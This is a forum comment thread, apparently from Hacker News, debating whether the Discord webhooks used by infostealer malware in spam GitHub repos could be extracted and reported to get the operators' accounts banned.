These repos post to Discord webhooks to notify of newly compromised systems.
I’ve found Discord to be responsive to abuse complaints in the past. If someone wrote a simple script to download these repos and extract the Discord webhook links I bet you could get Discord to shut down their accounts.
In my past experience Discord was aggressive about this, going so far as to ban the accounts of people who had participated on those servers with clearly illegal purposes. They’ll come back and make new accounts again, of course, but having them lose all of their connected servers, history, and requiring them to update every single one of their malware drops should slow them down considerably.
The responsible thing would be also to release all related data, icluding personal information (IP adresses, emails, list of contacts, chat logs) to investigation (police, etc)
I’m sure they report serious crimes and at least retain records for questionable activity.
I don’t get visibility into internal Discord operations, though. We just see that the perpetrators lost both their Discord server and their accounts disappeared from other Discords they were in. They angrily returned later with new usernames.
That would be a tremendous amount of work, at best they might be forwarding it to some CERT. But I doubt even that. Shutting down the accounts is probably the best they can do.
Law enforcement has ways to work across borders (international agreements, etc).
Such mechanisms should and will improve with time.
If a countly doesn't provide legal support against scammers, then the requesting country can reciprocate - declare green light for scammers agains the refusing country.
i did, in fact, read the article. you said "a simple script to download these repos". the variety of malware would make the script not so simple, and not so effective.
> the variety of malware would make the script not so simple, and not so effective.
The article is about using scripts to identify and download the malware. They identified over 1000 matching repos, which would contain Discord webhooks in the script.
Scanning and identifying has already been done. That’s literally what the article is about.
It’s right in the second paragraph:
> As soon as you download and launch any of these, all the data from your computer is collected and sent to some discord server
yes, they identified spammy repos. you'd also need to identify which repos belong to which spammer groups, it's not just one person doing this (as mentioned in the article) -> they don't use the same malware. saying "sent to some discord server" is like saying "playing games on my nintendo". the malware is also obfuscated (as mentioned in the article) which makes identifying the home server harder with static analysis.
Collect all the scripts matching the template. Extract the “trust” variable. Decode base64. Send to Discord with proof of how it was obtained.
Discord then identifies the Discords matching those webhooks.
It’s not some hard static analysis problem. These are python scripts with a base64 encoded variable. I don’t understand why you’re making it out to be something other than what the article says.
the article details how github is spammed by multiple people who read one guide. not every single one of the 1000 repos is THE SAME breed of malware. some overlap, maybe. but some is c#, some is rust, some is python. out of those that are python, some are obfuscated with this love/trust/joy obfuscator, some use pyarmor, some are compiled with nuitka. no, the guide does not instruct you which malware strain to use, only how to game github for traffic.
if it was that simple it would be a solved problem. i encourage you to give it a shot
NOT the same malware template. article only details how "This first repo I found" works, not all of them. look at how his github searching script works in "Scraping Github" - there is no way to determine what malware is in the repo, only that it is doing keyword stuffing.
...why? what's the difference between "POST payload to discord webhook" vs. "POST payload to VPS rented anonymously"? it seems like an inexplicably bad decision to use a proprietary US service for your malware C&C
I’ve found Discord to be responsive to abuse complaints in the past. If someone wrote a simple script to download these repos and extract the Discord webhook links I bet you could get Discord to shut down their accounts.
In my past experience Discord was aggressive about this, going so far as to ban the accounts of people who had participated on those servers with clearly illegal purposes. They’ll come back and make new accounts again, of course, but having them lose all of their connected servers, history, and requiring them to update every single one of their malware drops should slow them down considerably.